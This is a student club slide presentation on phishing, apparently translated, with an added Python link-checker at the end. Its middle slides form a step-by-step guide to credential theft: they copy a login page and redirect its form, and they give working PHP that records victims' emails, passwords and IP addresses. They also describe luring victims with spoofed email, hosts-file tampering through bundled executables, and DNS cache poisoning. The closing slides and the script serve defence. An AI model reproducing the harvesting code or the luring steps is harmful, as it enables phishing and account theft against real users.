Understanding Phishing Techniques

The document is a presentation on phishing, detailing its definition, methods of execution, and statistics related to its prevalence. It outlines the necessary preparations for creating phishing attacks, including the use of misleading websites and email traps, as well as techniques like DNS cache poisoning. Additionally, it provides guidance on how individuals can protect themselves from such attacks by verifying website security and being cautious with personal information.

1

The Computer and Free Software Club of the Polytechnic School of Tunisia

Phishing
Prepared by:
Mohamed Amine RHOUMA
Marwen ZORGUI

11/11/2011 2010
2
Illegal

3
LOL …

4
Disclaimer

This presentation is for educational purposes. It is strictly illegal to apply it for dishonest purposes.

5
PLAN

What is Phishing??
Necessary preparation
Trap the victim
How to protect oneself??

6
PLAN

What is Phishing?
Necessary preparation
Trap the victim
How to protect oneself??

7
Definition
Concatenation of phreaking (hacking of telephone systems) and fishing

Go fishing for information

Also known as Phishing and Scamming

Technique used by fraudsters to obtain personal information

8
Principle of the attack

FAKE SITE:
The victim believes they are on a trustworthy site when entering their personal data, but in reality they are sending it to the computer hackers.

9
Principle

Access to the misleading page

Entering confidential information

Data recording by the criminal

10
Some statistics...
In 2007, phishing brought the pirates 3.2 billion dollars

Sites targeted by phishing: all sites containing personal data, especially banking data (PayPal, Facebook, SNCF, CAF,...)

55,000 computer users fall victim to phishing scams every month worldwide

11
PLAN

What is Phishing?
Necessary preparation
Trap the victim
How to protect oneself??

12
Necessary preparation

Creation of the misleading page

Data storage

13
Creation of the misleading page
Saving the original page along with its images and other files (CSS: Cascading Style Sheets, JavaScript...)

14
Creation of the deceptive page

Modify the source code of the deceptive page, and more precisely the ACTION attribute of the <FORM> tag

Firebug: add-on for Firefox

15
Editing with Firebug

16
Creation of the misleading page
<form
method ="POST"
action="[Link]
<input name="email" value="Adresse électronique" type="text">
<input name="pass" type="password">
</form>

Becomes:
<form
method="POST" action=“[Link]" >
<input name="email" value="Adresse électronique" type="text">
<input name="pass" type="password">
</form>

17
Necessary preparation

One can use WampServer, which lets our machine behave like a server

Another alternative is to host our web page on the internet

18
Data storage

We have several methods to retrieve the data:
•Use of a database
•Use of [Link]
•Use of the mailto function
•Etc.

19
Database: creation

20
Database: PHP code

<?php
mysql_connect("localhost","root","");
mysql_select_db("madrid");

$a=$_POST["email"];
$b=$_POST["pass"];
$c=$_SERVER["REMOTE_ADDR"].

$reponse=mysql_query("INSERT INTO tableau VALUES('','$a','$b','$c')") or


die(mysql_error());

Header("Location: [Link]

?>

21
TXT file
<?php
$fp = fopen("[Link]", "a+");

fputs($fp,$_POST[email]);
fputs($fp," ");
fputs($fp,$_POST[pass]);
fputs($fp, " ");
fputs($fp," ");
fputs($fp,$_SERVER["REMOTE_ADDR"]);
fputs($fp, " ");

fclose($fp);

Header("Location:[Link]
?>

22
PLAN

What is Phishing?
Necessary preparation
Trap the victim
How to protect oneself??

23
24
Trap the victim

Trap mail

Hosts file

DNS Cache poisoning

Etc.

25
Trap mail
Simple, quick and efficient

Create an email address that imitates a trusted third party (disposable addresses, fake email...), for example sami@[Link]

Reproduce the logo of the company whose identity is being impersonated.

Find a pretext for the victims to come to the fake site and enter their personal information.

Send the phishing email to as many people as possible.

26
Hosts file
In the folder:
C:\Windows\System32\drivers\etc

This file is consulted before the DNS server is queried

It allows the system to know the IP address associated with a domain name without making a DNS request

27
hosts file

Attack by a .rar archive whose extraction replaces the hosts file

Attack by an .exe file whose installation modifies the hosts file (Binder)

28
Binder: principle

[Link] [Link]

[Link] (Trapping)

29
hosts file

Linux prevents all kinds of attacks

30
DNS Cache Poisoning
DNS servers have a cache that keeps, for a certain time, the mapping between a machine name and its IP address

DNS Cache Poisoning involves corrupting this cache with false information

31
Brief

Trap mail
Hosts File
DNS Cache poisoning
•…

32
PLAN

What is Phishing?
Necessary preparation
Trap the victim
How to protect oneself??

33
How to protect oneself??

Make sure, when you enter sensitive information, that the browser is in secure mode (https)

34
How to protect oneself??

•Ensure that the domain of the site in the address corresponds to the one announced (beware of the spelling of the domain)
•Beware of websites of the type [Link]
•Check the links in emails even if they come from a trusted source

35
How to protect oneself??
One must be particularly vigilant when one encounters a web address containing the symbol ‘@’
For example, the address [Link] leads to [Link] and not to [Link] as one might believe
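
The checks from the last three slides (https, domain match, the ‘@’ symbol) can be automated before a link is opened. This is an added example, not part of the original presentation; `inspect_link`, the warning labels and all domains used are hypothetical, constructed values.

```python
from urllib.parse import urlsplit


def inspect_link(url, expected_domain):
    """Return (real_host, warnings) for a link claiming to lead to expected_domain."""
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".")   # hostname is already lowercased
    expected = expected_domain.lower().rstrip(".")
    warnings = []

    # Slide 33: sensitive data should only travel over https.
    if parts.scheme != "https":
        warnings.append("not-https")

    # Slide 35: everything before '@' in the authority part is userinfo,
    # so the browser connects to what comes AFTER the '@'.
    if "@" in parts.netloc:
        warnings.append("userinfo-before-@")

    # Slide 34: the real host must be the announced domain or a subdomain of it.
    if host != expected and not host.endswith("." + expected):
        warnings.append("host-mismatch")
        # The trusted name appears in the authority, but only as decoration.
        if expected in parts.netloc.lower():
            warnings.append("trusted-name-as-decoy")

    return host, warnings


if __name__ == "__main__":
    # Constructed sample links.
    samples = [
        "https://www.bank.example/login",
        "http://www.bank.example@phish.test/login",
        "https://bank.example.secure-login.test/",
        "https://bamk.example/",
        "https://bank.example/@user",
    ]
    for link in samples:
        print(link, "->", inspect_link(link, "bank.example"))
```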

36
How to protect oneself??
Only download programs from
official sites
Use an antivirus

37
Surprise!!

Our first victim was ....

38
39
Thank you for your
attention !!
40
